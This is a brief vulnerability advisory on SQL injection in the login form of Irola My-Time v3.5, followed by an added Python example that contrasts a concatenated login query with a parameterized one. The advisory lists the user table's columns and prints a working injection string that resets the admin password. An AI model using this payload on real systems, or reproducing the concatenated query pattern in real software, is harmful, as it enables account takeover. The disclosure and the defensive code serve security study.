
Irola My-Time v3.5 SQL Injection



Aria-Security.net: Irola My-Time v3.5 SQL Injection



Aria-Security Team
http://Aria-Security.Net
-----------------------------
Original Advisory (and more details) @ http://aria-security.net/forum/showthread.php?p=1106
Irola My-Time v3.5
http://www.irola.com

The Username/Password fields can run SQL queries. Therefore:
We get the tables:

UserInfo.UserID
UserInfo.Login
UserInfo.Password
UserInfo.UserNumber
UserInfo.FirstName
UserInfo.LastName
UserInfo.TeamID
UserInfo.Address
UserInfo.City
UserInfo.ZipCode
UserInfo.CountryID
UserInfo.Phone

Useful Injection: (changes admin's password to hacked)
-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--

MORE HELP AT the Original Page.

Greetz: AurA
Credit goes to Aria-Security Team
Regards,
The-0utl4w
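
An added example, not part of the original advisory or the vendor's code: the string-concatenated login query that this class of bug implies, next to a parameterized version, using the `UserInfo` columns listed above. The query shape, the function names and SQLite as a stand-in database are assumptions, and the sample row is constructed.

```python
import sqlite3

# String quoted in the advisory, used here only as test input.
ADVISORY_INPUT = "-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--"

def make_db():
    """In-memory stand-in database with one constructed sample row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE UserInfo "
               "(UserID INTEGER PRIMARY KEY, Login TEXT, Password TEXT)")
    db.execute("INSERT INTO UserInfo VALUES (1, 'admin', 'constructed-secret')")
    return db

def build_login_sql_unsafe(login, password):
    """Assumed vulnerable pattern: field values pasted into the SQL text.
    The statement is only built here, never executed."""
    return ("SELECT UserID FROM UserInfo WHERE Login = '" + login +
            "' AND Password = '" + password + "'")

def sql_outside_literals(sql):
    """Return the parts of a statement that sit outside '...' literals
    (naive quote pairing, enough to show where the input ended up)."""
    return "".join(sql.split("'")[0::2])

def login_safe(db, login, password):
    """Hardened form: field values travel as bound parameters, so the
    database treats them as data and never parses them as SQL."""
    row = db.execute(
        "SELECT UserID FROM UserInfo WHERE Login = ? AND Password = ?",
        (login, password)).fetchone()
    return row[0] if row else None

def admin_password(db):
    """Read back the stored value for UserID 1 to confirm it is unchanged."""
    return db.execute(
        "SELECT Password FROM UserInfo WHERE UserID = 1").fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    unsafe = build_login_sql_unsafe(ADVISORY_INPUT, "x")
    print("input became SQL syntax:", "UPDATE" in sql_outside_literals(unsafe))
    print("parameterized login result:", login_safe(db, ADVISORY_INPUT, "x"))
    print("admin row intact:", admin_password(db) == "constructed-secret")
```

With bound parameters the advisory's string is compared as a literal login name, matches no row, and the `UserInfo` row is left untouched.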
